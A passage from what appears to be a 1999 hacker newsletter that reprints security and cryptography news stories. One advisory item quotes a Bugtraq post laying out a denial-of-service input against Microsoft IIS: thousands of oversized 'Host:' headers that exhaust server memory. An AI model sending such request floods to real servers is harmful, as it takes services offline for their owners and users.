Security Agency, spoke to the conference Thursday about weak quality
assurance in commercial security products, but declined to answer press
questions.
Longer keys are harder to set up and take more computer power to operate.
Such power may be scarce in the wireless telephones, home appliances and
other computerized conveniences of the future, cryptographers said.
@HWA
50.0 HACKING YOUR WAY TO AN IT CAREER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Friday 13th August 1999 on 1:30 am CET
It's not a secret that talented hackers eventually often end up in IT-related jobs. David
Del Torto, director of technology for security services at Deloitte & Touche in San
Francisco, presented hacker career workshops on the Chaos Computer Camp last
weekend. Here are some of his tips. Interesting note: according to Del Torto, the
talented programmers are preceded by their reputation in the small IT security
community and that he won't hire or recommend people who don't act responsibly. It's
all about the ethics eh? So what would you do?.
(Online News, 08/12/99 05:34 PM)
Hacking your way to an IT career
By Ann Harrison
ALTLANDSBERG, GERMANY -- At the first annual Chaos
Communication Camp, which took place outside of Berlin
last weekend (see story), hundreds of hackers and their
machines filled the main hack tent exchanging information
on the latest exploits and security tools. Most were young,
skillful and in demand by corporate information technology
departments.
The camp, which attracted some of the most talented
European and American hackers, was one of the largest
hacker gatherings in Europe so far this year.
David Del Torto, director of technology for security services
at Deloitte & Touche in San Francisco, agreed. He noted
that hackers like himself were working at all the top five
auditing and accounting firms.
Del Torto presented hacker career workshops with titles
such as "Take This Job and Ping It/Hacking The Corporate
Ladder For Fun & Profit."
The following are some of the tips he offered hackers
seeking corporate jobs:
- Write your own job description.
- Volunteer for a project in your area of expertise.
- Network with people.
- Start your own company.
- Or sign on to another start-up.
He also advised the crowd to build tools they themselves
would use ("You should be customer No. 1!"), license
technology when appropriate and solve problems with free
software or generate it.
"When building reputation capital, it's pretty important to
learn to think like the boss,'' he said.
In addition to his day job, Del Torto is a member of the
Cypherpunks, a San Francisco-based hacking organization
that produces what he calls "no-compromise" security
technology.
Del Torto had advice for his Fortune 1000 brethren, too.
Asked if young hackers, who may not be partial to suits and
ties, are discriminated against, Del Torto recalled that Dan
Farmer, author of the widely used Satan network scanning
tool, was once turned down by a prospective employer who
found his appearance unsettling. He urged IT managers to
avoid superficial judgments and focus on the reputation of
the individual. IT managers interviewing young people who
"act differently" should remember when they were young, he
advised.
Del Torto noted that in the relatively small community of IT
security professionals, people are preceded by their
reputations. He said he knows programmers who are
talented, but he won't hire or recommend them because
they don't act responsibly.
@HWA
51.0 BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Friday 13th August 1999 on 1:00 am CET
Baltimore Technologies expects to ship an encryption and digital signature tool kit
that will let users secure documents based on XML later this fall. The X/Secure tool
kit will be able to encrypt XML and allow users to authenticate reciptients by digital
signatures. Read more.
Baltimore Technologies to ship encryption tool for XML docs
By Ellen Messmer
Network World
Posted at 8:45 AM PT, Aug 12, 1999
Baltimore Technologies later this fall expects to ship an encryption and digital signature tool kit that will let users secure documents based on XML.
The X/Secure tool kit will let customers encrypt XML documents or use digital signatures to authenticate the identity of the author of the XML content and the
intended recipient. Digital signatures let customers check the content of a document to ensure it was not tampered with en route to the designated recipient.
The X/Secure tool kit will be sold to meet two specific development needs, according to Sean Coughlin, Baltimore product manager.
The first use would be as a Java-based utility to run on any Java Virtual Machine in order to automatically encrypt or sign XML-based documents and verify
signed XML documents. Second, the tool kit would let customers add digital signing and encryption capabilities to XML-based applications.
"We're basing the X/Secure tool kit on the IETF draft specification 'Digital Signatures for XML,' " Coughlin said. The World Wide Web Consortium is also
considering this draft specification for inclusion in the suite of XML standards it shepherds, he added. Information about the specification is posted on both
groups' Web sites.
Baltimore has not yet set a price for the X/Secure tool kit, which may be sold in two versions when it ships by the end of the third quarter.
Baltimore Technologies Inc., with headquarters in Dublin, Ireland, is at www.baltimoretechnologies.com.
For more information about enterprise networking, go to Network World Fusion at www.nwfusion.com. Copyright (c) 1999 Network World Inc. All
rights reserved.
@HWA
52.0 STARTUP WANTS TO SELL UNTAPPABLE PHONES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Friday 13th August 1999 on 12:40 am CET
Starium Inc plans to be selling telephone scrambling devices so powerful that even
the US government's most muscular supercomputers can't eavesdrop on wiretapped
conversations. Needless to say, the US government isn't too thrilled about the idea.
Wired.
Starium Promises Phone Privacy
by Declan McCullagh
3:00 a.m. 12.Aug.99.PDT
MONTEREY, California -- The sleepy coastal town of Monterey, California, is not the kind of place where vision-fired entrepreneurs come to change
the world. Monterey Bay is better known for sea lions than silicon, and for Cannery Row -- made famous half a century ago in John Steinbeck's
gritty, eponymous novel.
Today, the third floor of a converted sardine factory on Cannery Row is home to a startup company developing what could become a new world
standard in privacy protection. By early 2000, Starium Inc. plans to begin selling sub-US$100 telephone scrambling devices so powerful that even
the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations.
Such heavily armored privacy is currently available only to government and corporate customers who pony up about $3,000 for STU-III secure
phones created by the US National Security Agency. By squeezing the same kind of ultra-strong encryption into a sleek brushed-steel case about
twice the size of a Palm V -- and crafted by the same San Francisco designer -- Starium hopes to bring crypto to the masses.
"Americans by nature don't like people reading over their shoulders," says Lee Caplin, president and CEO of Starium.
True enough. But whether Americans will pay extra for privacy is open to question, especially since both people in a conversation need the Starium
"handsets" to chat securely.
And there's another big obstacle: The US government has repeatedly tried to keep similar products off the market unless they have a backdoor for
surveillance. Its export rules prevent Starium from freely shipping its products overseas.
Starium's three co-founders -- the company has since grown to eight people -- claim they're not fazed.
"The technology is out there. Whether they like it or not, it exists," says Bernie Sardinha, Starium chief operations officer. "You cannot stop
progress. You cannot stop technology."
Starium at first planned to call its product CallGuard, but abandoned the name after discovering another company owned the trademark. The firm is
considering VoiceSafe as another potential name.
Customers will use the device by plugging it into their telephone handset -- a feature allowing it to work with office systems -- and plugging the
handset into the base of the phone.
At the touch of a "secure" button, the modems inside the two Starium units will form a link that, theoretically, creates an untappable
communications channel. The units digitize, compress, filter, and encrypt voice communications -- and reverse the process on the other end.
The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the initial setup, and a 168-bit triple DES algorithm for voice encoding. The
four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a smart card port, and possibly serial, USB, and parallel interfaces, the
company says. The final version will operate for over 2 hours on a pair of AA batteries.
Starium's business plan is nothing if not ambitious. In addition to selling the portable units, the company wants to add crypto capabilities to cell
phones, faxes, and even corporate networks. Target markets include the legal, medical, banking, and even political fields.
"I've gotten a call from the George W. Bush people for use in the campaign," CEO Caplin says.
The company says it's working on deals with major cell phone manufacturers like Ericsson and Nokia to offer the same voice-scrambling in software.
Newer cell phones have enough memory and a fast enough processor to handle the encryption. Best of all, a software upgrade could be free.
"You take your phone into a mall or a kiosk and they simply burn in the new flash ROM," Sardinha says.
The idea for Starium came from longtime cypherpunk and company co-founder Eric Blossom, who was inspired by the Clinton administration's
now-abandoned Clipper Chip plan to devise a way to talk privately.
"I got interested around the time of Clipper. I was scratching my head saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett
Packard and Clarity Software.
Blossom created prototype devices and sold them online. But they were clunky -- about the size of a desktop modem. They were also expensive,
and didn't sell very well.
The company's directors include Robert Kohn, former chief counsel for PGP and Borland International, and Whitfield Diffie, distinguished engineer at
Sun Microsystems and co-inventor of public key cryptography.
@HWA
53.0 OUTSMARTING THE WILY COMPUTER VIRUS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Friday 13th August 1999 on 12:10 am CET
CNN has yet another story on computer viruses. This one doesn't deal with any
specific viruses however, but more with the precautions you can take. Mostly "make
backups" and "update your AV-software" stuff you could think up yourself, but o what
the hell :)
Outsmart the wily computer virus
August 11, 1999
Web posted at: 3:21 p.m. EDT (1921 GMT)
by Carla Thornton
(IDG) -- PROBLEM: Even if your PC runs an antivirus program, the risk of
a data-destroying infection is real.
SOLUTION: Take a few additional precautions to help keep your computer
safe and sound.
Shane Toven never worried about computer
viruses. The chief engineer and IS manager
for KAXE-FM in Grand Rapids, Minnesota,
knew that the whole staff used antivirus
software and practiced "safe computing."
Then last April, Chernobyl -- one of the year's
deadliest viruses -- slipped past the public
radio station's security. Two of the station's
Windows 95 machines suffered full
meltdown.
"At first, all of our PCs worked fine on April
26, the day Chernobyl was supposed to hit.
Then a couple of t hem quickly ground to a
halt," remembers Toven. "When I went to
reboot, I got the dreaded 'insert system disk'
message. According to Fdisk, there were no
partitions and no boot sectors -- classic signs
of Chernobyl."
Feeling more than a little sheepis h, Toven
realized he hadn't updated McAfee
VirusScan's signatures, the data files that
identify specific viruses. (He was using an
older version of the package that could not
update itself automatically.) Chernobyl
probably sneaked in "through a contamina ted
file attached to an e-mail from someone we knew," he says. The virus
destroyed 2 gigabytes of data, including employee records, correspondence,
and other vital files.
Even if you follow the usual safeguards -- installing and updating a good antivi
rus package, avoiding e-mail attachments from strangers, and never
downloading files from the Internet -- your system probably isn't 100 percent
safe from viruses. Few of us compute in isolation, never exchanging files with
others. New viruses can claim c asualties before antivirus vendors identify
them. Your best line of defense is to assume your PC will become infected --
and take steps now to save your neck.
Smart precautions
Experts and survivors who've tangled with the nastiest viruse s offer the
following wisdom:
MAKE UPDATING SIGNATURE FILES EASY: As Toven discovered,
the key to warding off most attacks is simply keeping your antivirus software
updated. But remembering to check for new signature files, downloading
them, an d distributing them to the people who need them can be a hassle.
Fortunately, most programs now remind you when signature files need to be
updated, and will download the update for you from the company's Web site at
the click of a button. The best, includ ing Norton AntiVirus, PC-cillin, and
McAfee VirusScan, perform this job automatically as often as once a day.
KEEP A BOOT DISK HANDY: Melissa and other Word and Excel macro
viruses that torment most users at one time or another do little seriou s
damage. But an infestation such as Chernobyl may stop your PC from even
starting up. That's when you reach for the boot disk -- a floppy from which
you can run the antivirus program's scanner if your PC becomes inoperable.
Most antivirus packages give y ou the option of making a boot disk during
setup. If yours does not, you can easily make your own, notes Ken Dunham,
virus expert at About.com (formerly the Mining Company). Dunham says
users can find instructions for creating a start-up disk, plus other virus-related
advice, at antivirus.about.com (link below). "You should boot from a clean disk
before removing a virus," he says. "Some viruses can't be cleaned any other
way."
USE MORE THAN ONE ANTIVIRUS UTILITY: No single antivirus
package can detect and remove every virus, so using multiple programs
lessens the chance of a virus getting through. "Pay for one commercial
package and add one or more free programs," suggests Dunham. "Set the
primary package to scan all the time and use the second ary programs only
when you need them, so they don't conflict. It's like getting a second opinion
from a doctor." Find a list of free antivirus products at
antivirus.about.com/library/weekly/aa051099.htm (link below). And pick up
extra protection from a fr ee Web-based scanning service like Trend Micro's
HouseCall or Network Associates' McAfee Clinic (links below).
CLEAN UP AFTER AN INVASION: Once you rid your PC of its
marauder, don't stop there, advises Joe Wells, author of the WildList of viru
ses. "Read up on what the virus does to files, then take steps to eliminate
unpleasant surprises down the road," he says. "For instance, Melissa turns off
the dialog box asking if you want to enable macros in Microsoft Word
documents, so after disinfectin g you'll need to turn that feature back on to
remind yourself you have that security option." (In Word 97, select Tools,
Options, click General, and check "Macro virus protection"; in Word 2000,
select Tools, Macros, Security and choose Medium security.)
Back in Grand Rapids, Shane Toven was about to reformat the hard drives on
his devastated computers when he happened upon PowerQuest's Lost &
Found data-recovery utility (link below). "I downloaded and installed the demo,
and in half an hour, I had re covered all my wiped-out files," reports Toven.
Another utility, the free MRecover (link below), can also restore
Chernobyl-savaged computers.
Toven got a lucky break. Your best defense: Keep backups of all your vital
data. After his near-fatal brush with Chernobyl, Toven changed his modus
operandi: "I went out and bought a separate NT server just for backups," he
reports. "I also now keep clean, write-protected boot disks for each operating
system we use."
Carla Thornton is a contributing editor for PC World. If you're having trouble resolving a
PC-related hardware or software probl em, we'd like to hear from you.
@HWA
54.0 NEW MAIL ATTACK IDENTIFIED
~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 5:00 am CET
Information security consultant R. Rosenberger says to have developed an
e-mail-borne attack which can potentially defeat most major network security and
anti-virus software products. Instead of slipping in undetected this attack attacks the
security software head-on as it tries to scan e-mail attachments. The flaw is said to
be that most security software products are unable to handle "pathological events".
As an example is given a recursive e-mail attachment (multiple attachments in
attachments) which could crash security products trying to scan it and which on its
turn could take the whole operating system with it, effectively shutting the server
down. "I know of products where I can own the box, just by sending an e-mail that
nobody receives. I can own the e-mail server, the gateway server -- anything that's
part of the e-mail infrastructure," Rosenberger said. Full story.
http://www.internetnews.com/bus-news/article/0,1087,3_180651,00.html
New Attack on E-mail Infrastructure Identified
August 11, 1999
By Brian McWilliams
InternetNews.com Correspondent
Business News Archives
An information security consultant said Wednesday he's discovered a serious flaw in network security and anti-virus software products
-- a flaw that could threaten the Internet's e-mail infrastructure.
According to Robert Rosenberger, he's developed an e-mail-borne attack which can potentially defeat most major security products --
not by slipping by undetected, but by attacking the security software head-on as it tries to scan email attachments.
While most security software products can successfully protect themselves against code that tries to disable them, Rosenberger claims
they also contain programming errors which render them unable to handle what he calls "pathological events".
One example is a recursive e-mail attachment, or multiple attachments within attachments. According to Rosenberger, when security
products encounter such specially crafted files at the local or server level, most will crash, and take the operating system with them.
"I know of products where I can own the box, just by sending an e-mail that nobody receives. I can own the e-mail server, the gateway
server -- anything that's part of the e-mail infrastructure," Rosenberger said.
Besides consulting to corporations and government agencies, Rosenberger is the author of the Computer Virus Myths Web site which
critizies anti-virus software vendors for whipping up what he calls virus hysteria in an attempt to boost sales.
Rosenberger recently notified Network Associates, Symantec, and several other major antivirus software vendors about his findings
and most have promptly responded by upgrading their products to thwart the attack, which he calls the E-mail Infrastructure Security
vulnerability. Officials of the firms were not immediately available for comment.
A representative of the Computer Incident Advisory Capability (CIAC) Wednesday said that organization was not aware of
Rosenberger's findings. Officials from the Computer Emergency Response Team (CERT) were not immediately available for
comment.
While he hasn't publically released information about his exploit, Rosenberger says others could potentially discover similar flaws.
"In about three weeks, every wannabe hacker on the planet is going to know about this and post some kind of sample file, and they're
going to be a lot better than mine."
@HWA
55.0 ERROR IN MICROSOFT PATCH
~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 4:30 am CET
On 11 August 1999, Microsoft released a patch for the "Malformed HTTP Request
Header" vulnerability. A error has been discovered in that patch. Microsoft has
removed the patch from their ftp and are working on correcting the error and expect to
re-release the patch in a few days. MS Advisory.
http://www.microsoft.com/security/bulletins/ms99-029regression.asp
From http://www.securityfocus.com/
NT IIS Malformed HTTP Request Header DoS Vulnerability
Bugtraq ID: 579
Failure to Handle Exceptional Conditions
Remote: Yes
Local: Yes
Published: August 11, 1999
Updated: August 13, 1999
Microsoft Commercial Internet System 2.5
Microsoft Commercial Internet System 2.0
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
Microsoft Site Server 3.0 Commerce Edition
- Microsoft Windows NT 4.0
- Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
Microsoft Site Server 3.0
+ Microsoft Site Server 3.0 Commerce Edition
- Microsoft Windows NT 4.0
- Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
- Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft Commercial Internet System 2.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
Microsoft IIS and all other products that use the IIS web engine have a
vulnerability whereby a flood of specially formed HTTP request headers
will make IIS consume all available memory on the server and then
hang. IIS activity will be halted until the flood ceases or the service is
stopped and restarted.
Quoted from Nobuo Miwa's post to Bugtraq:
Simple play. I sent lots of "Host:aaaaa...aa" to IIS like...
GET / HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
...10,000 lines
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
I sent twice above request sets. Then somehow victim IIS got memory
leak after these requests. Of course, it can not respond any request
any more. If you try this, you should see memory increase through
performance monitor. You would see memory increase even after those
requests finished already. It will stop when you got shortage of virtual
memory. After that, you might not be able to restart web service and you
would restart computer. I tried this against Japanese and English
version of Windows NT.
Microsoft released a patch for this vulnerability on August 11, 1999.
However, on August 12, 1999 they retracted it due to an error that
made IIS hang whenever the logfile was an exact multiple of 64KB.
Microsoft is working to correct this error, and will re-release the patch
when it is solved.
Reported to Microsoft by Nobuo Miwa <n-miwa@lac.co.jp>.
Microsoft Security Bulletin MS99-029 released August 11,
1999.
advisory:
MS99-029: Patch Available for "Malformed HTTP
Request Header" Vulnerability
(MS)
web page:
Frequently Asked Questions: Microsoft Security
Bulletin (MS99-029)
(Microsoft)
web page:
Error in Patch for "Malformed HTTP Request
Header" Vulnerability
(Microsoft)
message:
IIS 4.0 remote DoS (MS99-029)
(Nobuo Miwa <n-miwa@lac.co.jp>)
@HWA
56.0 NEW IE5 BUG EXPOSES PASSWORDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 4:00 am CET
Techweb reports the following: "Bug-reporting sites have identified a new security
problem with Microsoft's Internet Explorer 5.0 browser. When users access an
FTP-protected site and then try to download files, their user name and password can
be exposed to snoopers. So far, there are no known cases of any break-ins caused
by the glitch. Techweb.
http://www.techweb.com/wire/story/TWB19990811S0013
@HWA
57.0 KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 3:20 am CET
Forbes has a story on a new crypto company setting up shop in the States, but
which is able to evade the US restrictions on the export of sensitive crypto because
their product designers reside in Sweden. Read more on the company and its
products here.
http://www.forbes.com/forbes/99/0823/6404078a.htm
Software Fund Survey Database
An encryption firm finds the key to success: not being born in the U.S.A.
Data lock
By Nikhil Hutheesing
E-COMMERCE will really take off only after we find better ways to keep sensitive personal and corporate data under lock and key. Keeping data secure yet accessible
to the right people is harder than you might think.
Protegrity, a Swedish firm invading the U.S. market by setting up its headquarters in Stamford, Conn., is making this market its own. One reason it can beat out U.S.
competitors in landing business from firms that span the globe: It can run around U.S. export restrictions on encryption software. Since it's a foreign-born business, it can
sell abroad without running afoul of U.S. export laws. It ships software from Sweden.
Protegrity's roots go back to 1994, when Ulf Dahl, a business executive who managed a software company in Stockholm, was writing software that would let city
governments store personal data--such as marriage certificates and medical histories--while keeping those data separate from citizens' names and inaccessible to
snoops. He came across Anonymity Protection, a Swedish startup in Gothenburg that was creating encryption software, and joined it.
Dahl and the engineers at Anonymity devised two programs. One sits on a server and stores the company's security policy, including information on who may access
which account files. That information is securely transmitted to all the other servers--perhaps thousands of them--that plug into a company's databases. A second
program then encrypts the designated files on the database.
Note that this lock and key is a bit different from what you usually see in a computer network storing sensitive data. Your brokerage firm, for example, often stores your
account data and password in unencrypted form on a server. It protects your information by encrypting the transmission of the data across phone lines. Your password
is scrambled as it leaves your modem, thwarting an eavesdropper who might tap into the phone line. But the trading records are stored in plain text. Someone breaking
into the broker's database server could get access to them.
In the Protegrity system, you encrypt only the specific data you want to keep hidden from snoops while leaving other data accessible to internal users or outsiders
tapping in, perhaps, over the Internet. Data can be encrypted at 128 bits or higher (you could need more computers than the Pentagon has to crack the code).
Getting hold of data by unauthorized users is tough because a series of events, transparent to the user, have to occur. When you try to gain access to information,
Protegrity's system checks to see if you have been included as an authorized user in the gatekeeper. If you pass that, it goes on to double-check that the database that
keeps your data is also instructed to let you in. Then it checks a series of rules that determine the information you are allowed to see. Once you pass those steps, and the
system sees you are allowed to see the encrypted data, it generates a decryption key that is stored by the gatekeeper in encrypted form.
In 1996 Protegrity set up shop above a restaurant overlooking a marina in Stamford. "I realized that to make a success of this product, I would have to go where the
market was," explains Dahl. To run the show, the company hired David Morris, who had been an executive vice president at Cylink, a manufacturer of cryptographic
products.
Although Protegrity had become naturalized, it keeps its product designers in Sweden. The company continues to enjoy its exemption from the U.S. ban on exporting
sensitive encryption technology.
That ban was meant to prevent hostile nations and criminals from talking in ways that G-men can't understand, yet its effect has been to hand foreign firms a huge
advantage in the market for software to encrypt and decrypt sensitive files. That software segment could be worth $9 billion in sales over the next five years, says the
Economic Strategy Institute. At the end of 1997 there were already 653 encryption products being made in 29 countries outside of the U.S.
Unlike Protegrity, American encryption companies have to engage in some fancy footwork to stay legal. "It's like defusing mines--one wrong turn and the mine could
explode," says Stewart Baker, a partner in the law firm Steptoe & Johnson in Washington, D.C. For instance, if only two of a firm's engineers, one in the U.S. and one
abroad, were to exchange insights about an encryption algorithm, the U.S. government could shut the company down, fine it $1 million and jail its employees.
Tiny Protegrity has yet to turn a profit, but that could change. Oracle, IBM and Informix all promote a version of Protegrity's software that works with their databases.
Customers are also putting more of their sensitive data on-line. Lucent Technologies, which uses Informix's databases attached to a Protegrity security system, now lets
companies that buy wireless equipment log on to its Web site to pull up their account information. Before the switchover a few months ago, customer data had been kept
separate, and could be provided only by fax or phone.
Roche Holdings' Swedish offices used Protegrity to integrate patient information into its database. Now doctors there can key in the names of their patients, the drugs
they take and the side effects. If Roche's database detects a dangerous trend--say, too many patients begin fainting--Roche could quickly notify all the doctors.
There is pressure on the government to loosen the U.S. export laws on encryption. But even if that happens, Protegrity and its offshore rivals will have a head start over
any U.S. competitors.
@HWA
58.0 L0PHT IRDP ADVISORY
~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 3:40 am CET
"Companies and users of broadband modems beware: Malicious hackers may be
"listening" in on your computer's conversation across the Internet." ZDNet picks up on
the today released IRDP advisory by L0pht Heavy Industries, a flaw which could allow
an unauthorized user to intercept outgoing information, possibly modify unencrypted
or lightly encrypted data or deny service to the network. ZDNet story.
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Hackers may be snooping on you
By Robert Lemos, ZDNN
August 11, 1999 5:41 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2313209,00.html
Companies and users of broadband modems beware: Malicious hackers may be "listening" in on your
computer's conversation across the Internet.
That's the danger highlighted in a security advisory released on Wednesday by hacker-cum-security
specialists L0pht Heavy Industries. The flaw affects Windows 95, 98 and 2000 as well as the
SunOS and Solaris 2.6 running a network service known as the ICMP router discovery protocol, or
IRDP, that determines the route computers use to connect to the Internet.
The result: An unauthorized user can intercept outgoing information, possibly modify unencrypted or
lightly encrypted data, or deny service to the network.
A slight detour for data
Except for the denial of service attack, the malicious programmer needs to be inside the network,
stated the advisory. For cable modem users, however, an internal user could be anyone on the local
loop -- a neighbor or someone on the next block. Since many cable-modem-based networks use the
rerouting technology, users are left open to someone snooping their communications to the Internet.
In essence, another computer on the same network can be used to change the default path that
packets take out to the Internet. By placing the address of their own server in the system, an
attacker can look at all the outgoing packets of information.
While it's a bit of a one-sided conversation -- since incoming packets enter the network normally -- a
great deal of information can be gleaned from the outgoing packets, possibly including passwords
and credit cards numbers.
The most worrisome part of the flaw on Microsoft Windows is that the operating system continues
to be vulnerable even when the user believes they have closed the hole. (See the L0pht advisory.)
Some assembly required
In a move long considered controversial, L0pht has decided to release the source code to the basics
of a program that could exploit such a hole.
However, L0pht did delay the release of the advisory at Microsoft's request, said one L0pht
member, known by his handle Space Rogue, in an e-mail.
Microsoft and Sun Microsystems Inc. declined to offer comment while members of L0pht could not
be contacted.
@HWA
59.0 Stronger computers, easier encrypton, RSA coding
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.403-security.org/
Astral 12.08.1999 resource section is going to have more than 1000 links till the end of the day
If a new design of a computer gets build keys of a bank's and other organisations could be easy target of big company's
because that kind of computer would cost " only " $2 millions and that is not so much money for big company's. Adi Shamir
helped to develop new computer and new design of cripting known as RSA.Computer scientists said his work underscores the
growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key - a
sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered.
Links:
TechServers
http://www.techserver.com/noframes/story/0,2294,81475-128761-902330-0,00.html
Code-breakers are gaining on cryptography
Copyright � 1999 Nando Media
Copyright � 1999 Associated Press
From Time to Time: Nando's in-depth look at the 20th century.
BY JEFF DONN
WORCESTER, Mass. (August 13, 1999 10:29 a.m. EDT http://www.nandotimes.com) - Computer encryption experts say a new computer design, if built, could
crack the secret keys that now protect the bulk of electronic commerce.
The estimated cost of such a computer - $2 million - would be manageable for many organizations. But most highly sensitive military, banking and other
data are already protected by stronger keys, according to cryptographers at the conference where the design was shown.
The commonly used weaker keys, though, would become "easy to break for large organizations," said cryptographer Adi Shamir of the Weizmann
Institute of Science in Rehovot, Israel.
He developed both the new computer design and helped invent the widespread coding system - known as RSA public-key encryption - that it attacks.
Shamir spoke Thursday at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic
Institute.
Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512
bits. The key - a sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered.
Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine and also refers to the twinkle of its light
emitting diodes. The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA
encryption keys faster than ever - within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and
several months.
Shamir first informally showed a prototype of his device at a conference in Prague, the Czech Republic, in May. He publicly outlined its workings at length
for the first time Thursday.
"Twinkle is a little out there, but it looks like it's buildable to me," said Seth Goldstein, an expert in computer architecture at Pittsburgh's Carnegie Mellon
University.
Organized crime, friendly and unfriendly governments, research institutions and others might take an interest in such a project, conference participants
suggested.
In any event, users of 512-bit keys "should be worried," said Christof Paar, a computer engineer at Worcester Polytechnic Institute.
"In the current state of the art, it is not secure," added Bob Silverman, a research scientist at Bedford-based RSA Laboratories, a division of RSA Data
Security. Shamir co-founded RSA Data but no longer works there.
Longer keys, such as 1,024-bit, are already employed for many sensitive communications. But, out of intelligence and other concerns, the U.S.
government requires special permission to export software with the longer keys. The most popular browsers are normally set to just 512 bits.
Brian Snow, a technical director for information security at the National Security Agency, spoke to the conference Thursday about weak quality assurance
in commercial security products. But he declined to answer general questions for the press.
Though available, longer keys are harder to set up and take more computer power to operate. Such power may be scarce in the wireless telephones,
home appliances and other computerized conveniences of the future, cryptographers said.
@HWA
60.0 Security police isn't doing enough
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.403-security.org/
Astral 12.08.1999 meteor rain
Former federal prosecutor, Mark Rasch, says that while current cybercrime laws are extremely broad and could possibly be
interpreted in such a way that makes most internet users criminals, businesses should still invest heavily on network security
Links:
ZDNet
(Story url not found on ZDNet)
61.0 Hack attacks drive outsourced security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From ZDNet http://www.zdnet.com/filters/printerfriendly/0,6061,411335-54,00.html
--------------------------------------------------------------
This story was printed from PC Week,
located at http://www.zdnet.com/pcweek.
--------------------------------------------------------------
Hack attacks drive outsourced security
By Jim Kerstetter and John Madden, PC Week
August 8, 1999 9:03 PM PT
URL:
When it comes to implementing network security, even the outsourcers are turning to outsourcing
partners.
Internet Security Systems Inc., the company that put network intrusion detection on the map, will
announce this month that it is providing managed security services to Internet service providers such
as AT&T Corp. and to outsourcing companies such as Electronic Data Systems Corp. ISS has
similar partnerships in the works with British Telecommunications plc., MCI WorldCom Advanced
Networks and Nippon Telephone & Telegraph Corp., officials said.
Driving this second layer of outsourcing is the complexity of security technology, particularly
vulnerability scanning and intrusion detection, along with a shortage of people who can manage such
a critical part of a company's network. "We've actually been doing this ... for some time with a few
customers," said Tom Noonan, CEO of ISS, in Atlanta. "It's finally gaining some traction."
It's also likely to gain interest from harried IT administrators at places such as Cornell University's
Graduate School of Management. Two weeks ago, hackers broke into one of the school's Sun
Microsystems Inc. servers running a database of statistical research material. The intruder had set
up a File Transfer Protocol site on the server, presumably to take out information.
"[Intrusion detection] is almost becoming a full-time job--detecting it and then cleaning up after it,"
said Kevin Baradet, the Ithaca, N.Y., graduate school's network services director. Baradet is looking
to purchase intrusion detection software for the graduate school, with 24-by-7 support likely to weigh
heavily on his mind, he said.
Security outsourcing is not new. IBM Global Services, in Armonk, N.Y., has more than 450 people
dedicated to security, including an implementation program for ISS products. Companies such as
GTE Internetworking have been hosting security products for years.
But now, many more players are jumping into the market.
Compaq Computer Corp., for example, has begun a pilot project with ISS to provide intrusion
detection. The Houston company's Security Healthcheck service will, for now, be entirely managed
by Compaq consultants. It's in pilot testing with several customers and will be in general release by
the end of the year, said officials at Compaq's services division in Stow, Mass.
In addition, Control Data Systems Inc., of Arden Hills, Mich., last week announced security
outsourcing services, including perimeter security, data and resource protection, management and
monitoring, and identification and authentication.
For ISS, the next step is taking those relationships further. Not only is the company selling the
software and training to outsourcing partners, it also is providing a managed service to those
companies to ensure they're properly addressing their customers' security needs.
The outsourcing partners will set the pricing for the security services; IT managers can expect that
upfront costs will be less than buying their own security solutions. ISS' RealSecure Network Engine,
for example, costs $8,995, a price that doesn't include implementation or paying a trained
administrator to monitor it around-the-clock.
Over the coming year, ISS plans to improve the scalability of its vulnerability scanning and intrusion
detection products to make them more suitable for outsourced management, Noonan said.
In essence, ISS is offering itself as a manager of the burglar alarms of corporate networks, usually
through the outsourcing partner. "There is a need for someone to be the ADT [Security Services
